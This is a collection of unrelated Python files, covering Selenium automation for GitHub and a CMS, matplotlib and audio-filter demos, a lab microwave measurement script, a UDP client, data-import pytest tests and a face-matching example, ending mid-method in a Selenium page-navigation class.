|
#! -*- coding:utf-8 -*-
import os
import sys
from selenium import webdriver
# Base directory where new project folders are created.
path = '/home/crypt0n47/Desktop/Projects/'
# NOTE(review): the browser window opens at import time, before create() runs —
# consider moving this into create() so importing the module has no side effects.
browser = webdriver.Chrome()
browser.get("https://github.com/login")
# GitHub credentials come from the environment, never hard-coded.
username = os.environ.get('DB_USERNAME')
passwd = os.environ.get('DB_PASSWD')
def create():
    """Create a local project folder and a GitHub repository with the same name.

    Expects the repository/folder name as the first CLI argument; drives the
    already-open browser session to log in and submit GitHub's "new
    repository" form.
    """
    foldername = str(sys.argv[1])
    os.makedirs(path + foldername)
    # Fill in and submit the login form.
    python_button = browser.find_elements_by_xpath("//*[@id='login_field']")[0]
    python_button.send_keys(username)
    python_button = browser.find_elements_by_xpath("//*[@id='password']")[0]
    python_button.send_keys(passwd)
    python_button = browser.find_elements_by_xpath("//*[@id='login']/form/div[3]/input[4]")[0]
    python_button.click()
    # Open the header "+" menu and choose "New repository".
    task = browser.find_elements_by_xpath("/html/body/div[1]/header/div[7]/details/summary")[0]
    task.click()
    task = browser.find_elements_by_xpath("/html/body/div[1]/header/div[7]/details/details-menu/a[1]")[0]
    task.click()
    # Name the repository and submit the creation form.
    task = browser.find_elements_by_xpath("//*[@id='repository_name']")[0]
    task.send_keys(foldername)
    task = browser.find_elements_by_xpath("//*[@id='new_repository']/div[3]/button")[0]
    task.submit()
    # NOTE(review): find_elements_by_xpath was removed in Selenium 4 — confirm the
    # pinned selenium version, or migrate to find_elements(By.XPATH, ...).


if __name__ == "__main__":
    create()
|
# -*- coding: utf-8 -*-
"""
Created on Tue May 7 16:22:33 2019
@author: hp
"""
# Demo of matplotlib GridSpec: line plots and pie charts arranged on a 3x3 grid.
# (Fixes user-visible label typos: "Poplation" -> "Population", "assis" -> "axis".)
import matplotlib
import matplotlib.pyplot as abhi

grid = abhi.GridSpec(3, 3, wspace=1.2, hspace=1.1)

# Shared data for the second pie chart.
label1 = ["USA", "INDIA", "UK"]
value1 = [60, 80, 90]
color1 = ["r", "g", "b"]

abhi.subplot(grid[0, 0])  # top-left cell is left empty

# USA population line plot in cell (0, 1).
year = [1980, 1985, 1990, 1995, 2000, 2005, 2010, 2015]
USA = [5, 10, 17, 20, 15, 30, 35, 40]
abhi.subplot(grid[0, 1])
abhi.plot(year, USA, label="USA", color="g")
abhi.legend()
abhi.title("Population of USA ")
abhi.xlabel("Year")
abhi.ylabel("Population")

abhi.subplot(grid[0, 2])

# First pie chart in cell (1, 0), with the INDIA slice pulled out.
nishu1 = ["USA", "INDIA", "UK"]
nishu2 = [60, 80, 90]
abhi.subplot(grid[1, 0])
abhi.pie(nishu2, labels=nishu1, explode=(0, 0.1, 0), radius=1.9, autopct="%1.1f%%")
abhi.legend()

abhi.subplot(grid[1, 1])
# Second, colored pie chart in cell (1, 2).
abhi.subplot(grid[1, 2])
abhi.pie(value1, labels=label1, colors=color1, explode=(0, 0, 0), radius=2.1, autopct="%1.1f%%")
abhi.legend()

# INDIA population line plot in cell (2, 0).
abhi.subplot(grid[2, 0])
year = [1980, 1985, 1990, 1995, 2000, 2005, 2010, 2015]
INDIA = [10, 0, 30, 25, 50, 60, 70, 80]
abhi.plot(year, INDIA, label="INDIA", color="r")
abhi.legend()
abhi.title("Population of INDIA ")
abhi.xlabel("Year")
abhi.ylabel("Population")

abhi.subplot(grid[2, 1])
# Simple line plot in cell (2, 2).
x = [5, 9, 1, 7]
y = [4, 3, 7, 10]
abhi.subplot(grid[2, 2])
abhi.plot(x, y, label="line", color="r")
abhi.legend()
abhi.title("Graph")
abhi.xlabel("x-axis")
abhi.ylabel("y-axis")
abhi.show()
|
#!/usr/bin/env python
#
#
from pylab import *
from scikits.audiolab import wavread, wavwrite
from dafx_filter import *
from numpy import *
from scipy import stats
fs = 44100.


def pinknoise(n, rvs=stats.norm.rvs):
    """Return *n* samples of approximately pink noise.

    Sums up to six layers of random values, each layer held constant over
    runs twice as long as the previous one, then averages the layers.
    *rvs* draws the underlying random samples (standard normal by default).
    """
    depth = min(int(floor(log(n) / log(2))), 6)  # number of layers, capped at 6
    total = zeros((n, ), float64)
    hold = 1  # how many consecutive samples share one random draw
    for _ in range(depth):
        draws = int(ceil(float(n) / hold))
        total += repeat(rvs(size=draws), hold, axis=0)[:n]
        hold <<= 1
    return total / depth
def low_demo(snd, start, stop):
    """Sweep the lowpass cutoff linearly from `start` to `stop` Hz over the sound,
    writing the result to aplow_demo.wav."""
    freq = linspace(start, stop, len(snd))
    normal_freq = 2 * freq / fs  # normalize the per-sample cutoff to Nyquist
    lowpass_y = aplowpass(snd, normal_freq)
    wavwrite(lowpass_y, "aplow_demo.wav", fs)
def high_demo(snd, start, stop):
    """Sweep the highpass cutoff linearly from `start` to `stop` Hz over the sound,
    writing the result to aphigh_demo.wav."""
    freq = linspace(start, stop, len(snd))
    normal_freq = 2 * freq / fs  # normalize the per-sample cutoff to Nyquist
    highpass_y = aphighpass(snd, normal_freq)
    wavwrite(highpass_y, "aphigh_demo.wav", fs)
def allpass_demo(snd, amt, blend, feedback, feedforward):
    """Run the fixed allpass/comb effect over the sound and write allpass_demo.wav."""
    y = allpass(snd, amt, blend, feedback, feedforward)
    wavwrite(y, "allpass_demo.wav", fs)
def iir_comb_demo(snd, amt, blend, feedback):
    """Run the IIR comb filter over the sound and write iir_comb_demo.wav."""
    y = iir_comb(snd, amt, blend, feedback)
    wavwrite(y, "iir_comb_demo.wav", fs)
def var_allpass_demo(snd, amt, width, blend, feedback, feedforward, breakPoint):
    """Run the variable-delay comb (delay `amt` and `width` given in ms, modulated
    by `breakPoint`) and write var_allpass_demo.wav."""
    # NOTE(review): the call passes (..., blend, feedforward, feedback, ...) while
    # this function's parameters are (..., blend, feedback, feedforward, ...) —
    # confirm the swap matches universal_comb_variable's signature.
    y = universal_comb_variable(snd, amt / 1000., width / 1000., blend, feedforward, feedback, breakPoint)
    wavwrite(y, "var_allpass_demo.wav", fs)
def main():
    """Load the demo sounds and render the flanger example to var_allpass_demo.wav.

    The commented-out calls are alternative demos (lowpass/highpass sweeps,
    fixed allpass, IIR comb, chorus) kept for experimentation.
    """
    # import soundfile
    snd = wavread('trumpet.wav')[0]
    kick = wavread('kick.wav')[0]
    amb = wavread('amb.wav')[0]
    amb = amb * 0.8 # reduce gain of this soundfile a little bit
    print len(amb)  # Python 2 print statement; this file targets Python 2
    #low_demo(snd, 10., 500.)
    #high_demo(snd, 10000., 10.)
    #allpass_demo(snd, 1000, -find_c(1000., fs), find_c(1000., fs), 1.0)
    #iir_comb_demo(kick, 100, 0.5, -0.5)
    # Build a per-sample time axis and a 1 Hz sine LFO as the delay modulator.
    t = len(amb) / fs
    period = 1.0 / fs
    t_v = arange(0.0, t, period)
    delayTime = 2.0
    width = 1.0
    freq = 1
    breakPoint = (sin(2. * pi * freq * t_v))
    #breakPoint = linspace(1, -1, len(amb))
    #var_allpass_demo(snd, delayTime / 1000., width / 1000., -find_c(8000, fs), find_c(8000, fs), 1.0, breakPoint)
    #var_allpass_demo(amb, delayTime / 1000., width / 1000., 0.5, -0.5, 0.0, breakPoint)
    # flanger
    var_allpass_demo(amb, delayTime, width, 0.7, 0.7, 0.7, breakPoint)
    # chorus
    #breakPoint = pinknoise(len(snd))
    #breakPoint = breakPoint / max(breakPoint)
    #var_allpass_demo(snd, 20., 2., 0.7, -0.7, 1.0, breakPoint)


if __name__ == '__main__':
    main()
|
''' This program uses R&S ZND to detect the resonace of a microwave cavity and the IVVI S1H to apply a gate voltage to a coupled graphene.
The program eventually plots the reflection of the cavity as a function of the frequency and the gate voltage (2D plot).
Hardware to be used:
- R&S ZND VNA
- IVVI DAC (S1h): For gating
- Keithley 2000 or DMM6500: to measure the leakage current
- He7Temperature: to measure the temperature of the fridge
- Rigol: to power up the room-T amplifier
Before running the program:
- Make sure that in S2d, the appropriate DAC (in the current version, DAC 1) is set to S1h.
- Set an appropriate gain on the S1h
- If using DMM6500, switch to SCPI2000
- Make sure the low-T amplifier is well wired on the Matrix Module: Vg => pin #2, Vd => pin #3, GND => pin #4
- Make sure that room temperature amplifier is well wired: mounted on port 2 of the ZND and it is powered up with 15 V with Rigol
- Choose appropriate gate range (30V, 60V, 90V) and use the corresponding conversion factor as s1h_gain.
Wiring:
- For the reflection measurements with the directional-coupler inside the fridge: Output of the ZND (port 2) is connected to the side port "-20 dB" of the coupler, "output " port
eventually connected to the Port 2 on ZND (through the circulator and low-T amplifier) and "input" port to the resonator.
- Gate connection is via the free pin 3 or 4 on the fridge; connected to the S1h using SMA to BNC and then BNC to Lemo convertions.
- Gate leakage monitoring using MCS to BNC cable from "Current monitor" probe on S1h to KEITHLEY.
'''
import os
import numpy as np
import time
import stlab
import stlabutils
from stlab.devices.RS_ZND import RS_ZND
from stlab.devices.He7Temperature import He7Temperature
from gate_pattern import gate_pattern
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib.ticker import LinearLocator, FormatStrFormatter
import pygame, sys
from pygame.locals import *
from stlab.devices.IVVI import IVVI_DAC
from matplotlib import cm
from array import *
# Font used for the in-plot power annotation (plt.text below).
font = {'family': 'serif',
        'color': 'darkred',
        'weight': 'normal',
        'size': 16,
        }
###############################################################################################
''' Definitions'''
# Measurement definitions / settings
prefix = 'C25_UL_3p5K'  # file-name prefix for the saved data set
time_step = 1  # time step between gate-voltage steps, to stabilize the gate [s]
ramp_spead = 1000  # safe speed for ramping the gate voltage [mV/s]
gate = 0  # gate voltage [V]; be careful above +-30 V -- it normally reaches the current limit of the S1h (monitor the applied voltage with a separate Keithley).
start_freq = 4  # start frequency [GHz]
stop_freq = 8.5  # stop frequency [GHz]
freq_points = 501  # frequency sweep points
SweepTime = 0.5  # frequency sweep time [s]
frequency = np.linspace (start_freq,stop_freq,freq_points)
start_power = -40  # sweep power [dB]; instrument range: -45 to 3 dB
end_power = 3
power_points = 200
measure = 'OnePort'  # 'OnePort' or 'TwoPort'
# IVVI settings
s1h_gain = 15  # [V/V] manual gain set on the S1h module
DAC = 1  # DAC channel linked to the S1h
# output setting
save_data =True
pygame.init()
pygame.display.set_mode((100,100))  # small window so pygame can receive key events (the 's' stop key)
STOP = False
monitor_ratio = 5  # show 1 out of every "monitor_ratio" spectra while sweeping
##########################################################
''' Initializing the devices '''
# resetting the IVVI
dev = IVVI_DAC('COM4') # IVVI
dev.RampAllZero()
# initializing the ZND
ZND = RS_ZND('TCPIP::192.168.1.149::INSTR', reset=True)
ZND.ClearAll()
if measure == 'OnePort':
    ZND.SinglePort()
elif measure == 'TwoPort':
    ZND.TwoPort()
ZND.SetSweepfrequency(start_freq, stop_freq, freq_points)
ZND.SetIFBW(1e3) # Set IF bandwidth in Hz
ZND.SetSweepTime(SweepTime)
ZND.AutoScale()
# initializing the temperature reading (reading itself is commented out in the loop below)
tempdev = He7Temperature(addr='192.168.1.249',verb=False)
temp = 0
''' measurements '''
# Power sweep: for each VNA output power, acquire a spectrum, build 2D maps of
# amplitude and (linear-background-subtracted) phase, live-plot, and save.
power_pattern = np.linspace(start_power,end_power,power_points)
# modulating the gate voltage
count = 0 # counter of step numbers
leakage_current = 0  # NOTE(review): never updated below -- leakage logging is commented out
ramp_time = np.abs(np.floor(gate/ramp_spead))  # ramp duration [s] for the configured safe speed
dev.RampVoltage(DAC,1000*gate/s1h_gain,tt=ramp_time) # the factor 1000 is applied as the unit reads in mV.
Temp = np.array([])
S_amp = np.array([],[])
S_phase = np.array([],[])
for count,power in enumerate(power_pattern): # stepping up the VNA output power
    ZND.SetPower(power)
    data = ZND.MeasureScreen_pd()
    # pick the measured S-parameter columns according to the port configuration
    if measure == 'OnePort':
        amp_data = np.array(data['S11dB (dB)'])
        phase_data = np.array(data['S11Ph (rad)'])
    elif measure == 'TwoPort':
        amp_data = np.array(data['S21dB (dB)'])
        phase_data = np.array(data['S21Ph (rad)'])
    if count == 0:
        # First spectrum: ask the user for a frequency window, fit a straight
        # line to the phase there, and subtract that linear background.
        S_amp = amp_data
        S_phase = phase_data
        plt.plot(data['Frequency (Hz)'],phase_data)
        plt.show()
        Min = float(input('please enter min frequecy range for fitting the phase [GHz]:'))
        Max = float(input('please enter max frequecy range for fitting the phase [GHz]:'))
        index_1 = (np.abs(data['Frequency (Hz)'] - 1e9*Min)).argmin()
        index_2 = (np.abs(data['Frequency (Hz)'] - 1e9*Max)).argmin()
        z = np.polyfit(data['Frequency (Hz)'][index_1:index_2], (phase_data[index_1:index_2]), 1)
        adjusted_phase = (phase_data-z[0]*data['Frequency (Hz)'])*180/np.pi
        adjusted_phase -= np.amin(adjusted_phase)
    else:
        S_amp = np.array(np.vstack((S_amp,amp_data)))
        # NOTE(review): adjusted_phase is only computed in the count==0 branch,
        # so every later row stacks the FIRST spectrum's adjusted phase instead
        # of this iteration's phase_data -- confirm this is intended.
        S_phase = np.array(np.vstack((S_phase,adjusted_phase)))
        plt.rcParams["figure.figsize"] = [16,9]
        # Equivalent to (count-1) % monitor_ratio == 0 (floor-div equals true-div
        # only when the division is exact): live-plot every monitor_ratio-th sweep.
        if (count-1)//monitor_ratio == (count-1)/monitor_ratio:
            plt.subplot(4, 1, 1)
            plt.plot(data['Frequency (Hz)'],amp_data)
            plt.ylabel('S11dB (dB)')
            plt.text(10, .25,['Power: ', ZND.GetPower() , 'dB'], fontdict=font)
            plt.xlim(1e9*start_freq,1e9*stop_freq)
            plt.subplot(4, 1, 2)
            plt.plot(data['Frequency (Hz)'],adjusted_phase)
            plt.ylabel('Phase (°)')
            plt.xlim(1e9*start_freq,1e9*stop_freq)
            plt.subplot(4, 1, 3)
            plt.contourf(data['Frequency (Hz)'],power_pattern[0:count+1],S_amp)
            plt.ylabel('power (dB)')
            plt.title('S11dB (dB)')
            plt.subplot(4, 1, 4)
            plt.contourf(data['Frequency (Hz)'],power_pattern[0:count+1],S_phase)
            plt.ylabel('power (dB)')
            plt.xlabel('Frequency (Hz)')
            plt.title('Phase (°)')
            plt.pause(0.1)
    if save_data:
        # temp = tempdev.GetTemperature()
        data['Power (dBm)'] = ZND.GetPower()
        data['Gate Voltage (V)'] = gate
        data['Temperature (K)'] = temp
        data['Adjusted Phase (°)'] = adjusted_phase
        if count==0:
            # create the output file once, on the first sweep
            Data = stlab.newfile(prefix,'_',data.keys(),autoindex = True)
        stlab.savedict(Data, data)
        Temp = np.append(Temp,temp)
        # stlab.metagen.fromarrays(Data,data['Frequency (Hz)'],powers[0:i+1],xtitle='Frequency (Hz)', ytitle='Power (dB)',colnames=data.keys())
        # stlab.writeline(Data,data)
        # stlab.writeline(Gate_Data,[gate_voltage, leakage_current])
    for event in pygame.event.get(): # stopping if 's' pressed
        if event.type == QUIT: sys.exit()
        if event.type == KEYDOWN and event.dict['key'] == 115: # corresponding to character "s"
            STOP = True
    if STOP:
        break
dev.RampVoltage(DAC,0,tt=ramp_time) # to safely return back the gate voltage
dev.close()
print('FINISHED')
#############################################################
''' output '''
if save_data:
    plt.savefig(os.path.dirname(Data.name)+'\\'+prefix)
    Data.close()
plt.close()
|
# Client side: fire a single UDP datagram at the local server.
import socket

server_addr = ('127.0.0.1', 8080)
sock = socket.socket(type=socket.SOCK_DGRAM)
sock.sendto(b'Hi', server_addr)
sock.close()
import pytest
from core.fluent import Fluent
from core.src.custom_annotations import zid, tags
@tags('dataimport')
@zid('11111')
def test_import_same(request):
    """
    Validate data import creating 5 assets when:
    a) the dataimport field mapping is the exact same-title based mapping
    b) the file has content for all fields and the mandatory udf fields
    """
    importer = (
        Fluent(request)
        .data_import()
        .create_for_entity('ASSET')
        .where_field_mapping_is('SAME')
        .include_both_standard_and_udf_fields()
        .populate_dynamic_data_to_excel_file(no_of_rows=5)
    )
    importer.import_file().verify()
@tags('dataimport')
@zid('11112')
def test_import_same_only_standard_fields(request):
    """
    Validate data import creating 5 assets when:
    a) the dataimport field mapping is the exact same-title based mapping
    b) the file has content for standard fields and the mandatory udf fields
    """
    importer = (
        Fluent(request)
        .data_import()
        .create_for_entity('ASSET')
        .where_field_mapping_is('SAME')
        .include_only_standard_fields()
        .populate_dynamic_data_to_excel_file(no_of_rows=5)
    )
    importer.import_file().verify()
@tags('dataimport')
@zid('11113')
def test_import_same_only_udf_fields(request):
    """
    Validate data import for creation of 1 asset when:
    a) dataimport field mapping is set to exact same title based mapping
    b) file should have content for udf fields and mandatory udf fields
    """
    Fluent(request). \
        data_import().create_for_entity('ASSET') \
        .where_field_mapping_is('SAME') \
        .include_only_udf_fields() \
        .populate_dynamic_data_to_excel_file(no_of_rows=1) \
        .import_file().verify()
@tags('dataimport')
@zid('11114')
def test_import_similar(request):
    """
    Validate data import creating 5 assets when:
    a) the dataimport field mapping is the similar-title based mapping
    b) the file has content for all fields and the mandatory udf fields
    """
    importer = (
        Fluent(request)
        .data_import()
        .create_for_entity('ASSET')
        .where_field_mapping_is('SIMILAR')
        .include_both_standard_and_udf_fields()
        .populate_dynamic_data_to_excel_file(no_of_rows=5)
    )
    importer.import_file().verify()
@tags('dataimport')
@zid('11115')
def test_import_similar_only_standard_fields(request):
    """
    Validate data import creating 5 assets when:
    a) the dataimport field mapping is the similar-title based mapping
    b) the file has content for standard fields and the mandatory udf fields
    """
    importer = (
        Fluent(request)
        .data_import()
        .create_for_entity('ASSET')
        .where_field_mapping_is('SIMILAR')
        .include_only_standard_fields()
        .populate_dynamic_data_to_excel_file(no_of_rows=5)
    )
    importer.import_file().verify()
@tags('dataimport')
@zid('11116')
def test_import_similar_only_udf(request):
    """
    Validate data import creating 5 assets when:
    a) the dataimport field mapping is the similar-title based mapping
    b) the file has content for udf fields and the mandatory udf fields
    """
    importer = (
        Fluent(request)
        .data_import()
        .create_for_entity('ASSET')
        .where_field_mapping_is('SIMILAR')
        .include_only_udf_fields()
        .populate_dynamic_data_to_excel_file(no_of_rows=5)
    )
    importer.import_file().verify()
@tags('dataimport')
@zid('11117')
def test_import_manual(request):
    """
    Validate data import for creation of 5 asset when:
    a) dataimport field mapping is set to manual title based mapping
    b) file should have content for all fields and mandatory udf fields
    """
    # NOTE(review): this test passed 'Manual' while the sibling manual-mapping
    # tests (zid 11118/11119) pass 'MANUAL'; normalized to 'MANUAL' for
    # consistency -- confirm whether where_field_mapping_is is case-sensitive.
    Fluent(request). \
        data_import().create_for_entity('ASSET') \
        .where_field_mapping_is('MANUAL') \
        .include_both_standard_and_udf_fields() \
        .populate_dynamic_data_to_excel_file(no_of_rows=5) \
        .import_file().verify()
@tags('dataimport')
@zid('11118')
def test_import_manual_only_standard(request):
    """
    Validate data import creating 5 assets when:
    a) the dataimport field mapping is the manual-title based mapping
    b) the file has content for standard fields and the mandatory udf fields
    """
    importer = (
        Fluent(request)
        .data_import()
        .create_for_entity('ASSET')
        .where_field_mapping_is('MANUAL')
        .include_only_standard_fields()
        .populate_dynamic_data_to_excel_file(no_of_rows=5)
    )
    importer.import_file().verify()
@tags('dataimport')
@zid('11119')
def test_import_manual_only_udf_fields(request):
    """
    Validate data import creating 5 assets when:
    a) the dataimport field mapping is the manual-title based mapping
    b) the file has content for udf fields and the mandatory udf fields
    """
    importer = (
        Fluent(request)
        .data_import()
        .create_for_entity('ASSET')
        .where_field_mapping_is('MANUAL')
        .include_only_udf_fields()
        .populate_dynamic_data_to_excel_file(no_of_rows=5)
    )
    importer.import_file().verify()
@tags('dataimport')
@zid('111112')
def test_import_for_special_char_in_pick_list(request):
    """
    Validate data import creating assets when the data-import xls has the
    "ASSET ASSIGNED TO" field set to 'T&E, Automation' (special characters
    in a pick-list value).
    """
    importer = (
        Fluent(request)
        .data_import()
        .create_for_entity('ASSET')
        .where_field_mapping_is('SAME')
        .include_both_standard_and_udf_fields()
        .set_fields({'assigned to': 'T&E, Automation'})
        .populate_dynamic_data_to_excel_file(no_of_rows=1)
    )
    importer.import_file().verify()
@tags('dataimport')
@zid('111113')
def test_import_for_resource_with_middlename_in_pick_list(request):
    """
    Validate data import for creation of assets when:
    Data import xls has "ASSET ASSIGNED TO" field value with 'TEUser, QA'
    (a resource whose pick-list entry contains a middle name).
    """
    Fluent(request). \
        data_import().create_for_entity('ASSET') \
        .where_field_mapping_is('SAME') \
        .include_both_standard_and_udf_fields() \
        .set_fields({'assigned to': 'TEUser, QA'}) \
        .populate_dynamic_data_to_excel_file(no_of_rows=1) \
        .import_file().verify()
|
import face_recognition
import cv2
import argparse
# Construct the argument parser and parse arguments
ap = argparse.ArgumentParser()
ap.add_argument('-i1', '--image1', default='person_1.jpg',
                help='Path to input image 1, the first person you would like to recognize')
ap.add_argument('-i2', '--image2', default='person_2.jpg',
                help='Path to input image 2, the second person you would like to recognize')
ap.add_argument('-i3', '--image3', default='person_3.jpg',
                help='Path to input image 3, the third person you would like to recognize')
ap.add_argument('-i4', '--input', default='unknown_1.jpg',
                help='Path to input image 4, the unknown person you would like to recognize')
args = ap.parse_args()


def _load_rgb(path):
    """Read an image and convert it from OpenCV's BGR channel order to the RGB
    order that face_recognition (dlib) expects; raise if the file is unreadable."""
    img = cv2.imread(path)
    if img is None:
        raise FileNotFoundError(f'Could not read image: {path}')
    # BUGFIX: cv2.imread returns BGR, but face_recognition expects RGB images;
    # feeding BGR silently degrades the face encodings.
    return cv2.cvtColor(img, cv2.COLOR_BGR2RGB)


# Load the known images
img_1 = _load_rgb(args.image1)
img_2 = _load_rgb(args.image2)
img_3 = _load_rgb(args.image3)

# Get the face encoding of each person. face_encodings returns an empty list
# when no face is found, so fail with a clear message instead of an IndexError.
# Each reference photo is assumed to contain exactly one face, hence index [0].
known_face_encodings = []
known_names = []
for person, img in [('Person 1', img_1), ('Person 2', img_2), ('Person 3', img_3)]:
    encodings = face_recognition.face_encodings(img)
    if not encodings:
        raise ValueError(f'No face found in the reference image for {person}')
    known_face_encodings.append(encodings[0])
    known_names.append(person)

# Load the image we want to check
unknown_img = _load_rgb(args.input)

# Get face encodings for any people in the picture
unknown_face_encodings = face_recognition.face_encodings(unknown_img)

# There might be more than one person in the photo, so we need to loop over each face we found
for unknown_face_encoding in unknown_face_encodings:
    # Test if this unknown face encoding matches any of the three people we know
    results = face_recognition.compare_faces(known_face_encodings, unknown_face_encoding,
                                             tolerance=0.6)
    name = "Unknown"
    for matched, person in zip(results, known_names):
        if matched:
            # Keep the first match, mirroring the original if/elif priority.
            name = person
            break
    print(f"Found {name} in the photo!")
|
from selenium.webdriver import ActionChains
from DestroyerRobot.automation.util.ConfigUtil import Config
from DestroyerRobot.automation.util.XmlUtil import XmlUtil
from DestroyerRobot.automation.util.SystemOsUtil import SystemOs
from DestroyerRobot.automation.util.DateTimeUtil import TestDateTime
from DestroyerRobot.automation.com.cn.new_cms.servers.NC_TreeKids.NCTreeKids import MPTreeKids
from DestroyerRobot.automation.com.cn.base.BasePage import BasePage
from selenium import webdriver
import traceback
class test_nctree_kids:
    """Navigation driver for the NC tree menus of the new CMS.

    Each public ``get_link_*`` method looks up a menu item's locator in the
    basic_tree XML config, hovers over the element, dispatches to the matching
    MPTreeKids handler, and returns the resulting driver.  On failure a
    timestamped screenshot is saved and the traceback printed (the method then
    returns None, as before).  The previously copy-pasted flow now lives in a
    single helper, ``_open_tree_link``.
    """

    def __init__(self, driver):
        """Keep the WebDriver used for all subsequent page operations."""
        self.driver = driver

    def rootChildConfigPath(self):
        """Resolve the child config file path from the master config ("ConfigKIDs")."""
        conf2 = Config("ConfigKIDs")
        return conf2.get_configPath("new_cms_configs")

    def childConfigXML(self, Pageskeyword, UIElementkeyword):
        """Return the (by, value) locator pair for a page/element from the basic_tree XML."""
        confFile = self.rootChildConfigPath()
        config2 = Config("XMLFilePath", confFile)
        filepath = SystemOs().sys_path(config2.get_path_config("basic_tree"))
        return XmlUtil(filepath).xml_parsing(Pageskeyword, UIElementkeyword)

    def childConfigImgPath(self):
        """Return the error-screenshot directory, creating a per-day folder
        such as ``img/2019-01-01/`` if needed."""
        confFile = self.rootChildConfigPath()
        config3 = Config("ImgPath", confFile)
        img_path = config3.get_path_config("error_img")
        img_path = SystemOs().sys_path(img_path, TestDateTime().local_day())
        SystemOs().mkdirs_file(img_path)
        return img_path

    def _open_tree_link(self, section, item, action):
        """Shared flow for every ``get_link_*`` method.

        Looks up the locator for ``item`` under ``section``, moves to the tree
        entry, invokes the MPTreeKids handler named ``action``, and returns the
        driver.  On any exception a timestamped screenshot is saved, the
        traceback printed, and None returned implicitly (same contract as the
        original per-method code).
        """
        bys_points, values_points = self.childConfigXML(section, item)
        mptree = MPTreeKids(self.driver)
        try:
            BasePage(self.driver).move_to_ele(bys_points, values_points)
            getattr(mptree, action)(bys_points, values_points)
            return mptree.base.get_driver()
        except Exception:
            img_path = self.childConfigImgPath()
            mptree.base.save_img(img_path, str(int(TestDateTime().time_stamp())))
            print(traceback.format_exc())

    # 配置中心 -> 基础数据 (config center -> basic data)
    def get_link_Area_management(self):
        """片区管理 (area management)."""
        return self._open_tree_link("配置中心", "片区管理", "Area_management")

    def get_link_Bank_Data_management(self):
        """银行数据配置 (bank data configuration)."""
        return self._open_tree_link("配置中心", "银行数据配置", "Bank_Data_management")

    # 配置中心 -> 成交节点 (config center -> deal nodes)
    def get_link_Node_rule_settings(self):
        """节点规则管理 (node rule management)."""
        return self._open_tree_link("配置中心", "节点规则管理", "Node_rule_settings")

    def get_link_Settlement_Rules(self):
        """结佣规则管理 (commission settlement rule management)."""
        return self._open_tree_link("配置中心", "结佣规则管理", "Settlement_Rules")

    # 配置中心 -> 接口配置 (config center -> interface configuration)
    def get_link_Customer_State_Mapping(self):
        """客户状态映射 (customer state mapping)."""
        return self._open_tree_link("配置中心", "客户状态映射", "Customer_State_Mapping")

    def get_link_Project_mapping(self):
        """外部项目映射 (external project mapping)."""
        return self._open_tree_link("配置中心", "外部项目映射", "Project_mapping")

    def get_link_Interface_mapping(self):
        """外部接口映射 (external interface mapping)."""
        return self._open_tree_link("配置中心", "外部接口映射", "Interface_mapping")

    def get_link_Kingdee_push_Management(self):
        """金蝶推送管理 (Kingdee push management)."""
        return self._open_tree_link("配置中心", "金蝶推送管理", "Kingdee_push_Management")

    def get_link_Auxiliary_Account_Mapping(self):
        """辅助账项目映射 (auxiliary account project mapping)."""
        return self._open_tree_link("配置中心", "辅助账项目映射", "Auxiliary_Account_Mapping")

    def get_link_dev_Organizational_Relations(self):
        """楼盘映射组织关系 (property-to-organization mapping)."""
        return self._open_tree_link("配置中心", "楼盘映射组织关系", "dev_Organizational_Relations")

    def get_link_Auxiliary_Accounts_Mapping(self):
        """辅助账供应商映射 (auxiliary account supplier mapping)."""
        return self._open_tree_link("配置中心", "辅助账供应商映射", "Auxiliary_Accounts_Mapping")

    def get_link_Auxiliary_Account_Customer(self):
        """辅助账客户映射 (auxiliary account customer mapping)."""
        return self._open_tree_link("配置中心", "辅助账客户映射", "Auxiliary_Account_Customer")

    # 配置中心 -> 驳回设置 (config center -> rejection settings)
    def get_link_Reject_Category_Management(self):
        """驳回类目管理 (rejection category management)."""
        return self._open_tree_link("配置中心", "驳回类目管理", "Reject_Category_Management")

    def get_link_Rejection_Cause_Management(self):
        """驳回原因管理 (rejection cause management).

        NOTE(review): this entry is looked up under "左侧导航栏" (left nav bar),
        unlike its siblings which use "配置中心" -- preserved from the original;
        confirm it is intentional.
        """
        return self._open_tree_link("左侧导航栏", "驳回原因管理", "Rejection_Cause_Management")

    # 标准管控 -> 标准管理 (standards control -> standards management)
    def get_link_Project_Cooperation_Criteria(self):
        """项目合作标准 (project cooperation criteria)."""
        return self._open_tree_link("标准管控", "项目合作标准", "Project_Cooperation_Criteria")

    def get_link_Award_criteria(self):
        """团奖标准 (team award criteria)."""
        return self._open_tree_link("标准管控", "团奖标准", "Award_criteria")

    def get_link_Commission_settlement_standard(self):
        """佣金结算标准 (commission settlement standard)."""
        return self._open_tree_link("标准管控", "佣金结算标准", "Commission_settlement_standard")

    def get_link_Cost_Control_Standard(self):
        """费用管控标准 (cost control standard)."""
        return self._open_tree_link("标准管控", "费用管控标准", "Cost_Control_Standard")

    def get_link_investment_Control_standard(self):
        """跟投管控标准 (co-investment control standard)."""
        return self._open_tree_link("标准管控", "跟投管控标准", "investment_Control_standard")

    # 标准管控 -> 费用结算 (standards control -> expense settlement)
    def get_link_Expense_settlement_management(self):
        """费用结算管理 (expense settlement management)."""
        return self._open_tree_link("标准管控", "费用结算管理", "Expense_settlement_management")

    # 合约中心 -> 签约方管理 (contract center -> signing party management)
    def get_link_legal_person_management(self):
        """内部法人管理 (internal legal person management)."""
        return self._open_tree_link("合约中心", "内部法人管理", "legal_person_management")

    def get_link_Channel_brokerage_management(self):
        """渠道/经纪管理 (channel/brokerage management)."""
        return self._open_tree_link("合约中心", "渠道/经纪管理", "Channel_brokerage_management")

    def get_link_Developer_management(self):
        """开发商管理 (developer management)."""
        return self._open_tree_link("合约中心", "开发商管理", "Developer_management")

    # 合约中心 -> 合同管理 (contract center -> contract management)
    def get_link_Contract_signing_management(self):
        """合同签订管理 (contract signing management)."""
        return self._open_tree_link("合约中心", "合同签订管理", "Contract_signing_management")

    def get_link_Termination_contract(self):
        """合同终止 (contract termination)."""
        return self._open_tree_link("合约中心", "合同终止", "Termination_contract")

    def get_link_Contract_enquiry(self):
        """合同查询 (contract enquiry)."""
        return self._open_tree_link("合约中心", "合同查询", "Contract_enquiry")

    def get_link_Contract_type_management(self):
        """合同类型管理 (contract type management)."""
        return self._open_tree_link("合约中心", "合同类型管理", "Contract_type_management")

    def get_link_Model_management(self):
        """范本管理 (template management)."""
        return self._open_tree_link("合约中心", "范本管理", "Model_management")

    # 合约中心 -> 跟投规则 (contract center -> co-investment rules)
    def get_link_investment_Allocation_rule(self):
        """跟投分配规则 (co-investment allocation rule)."""
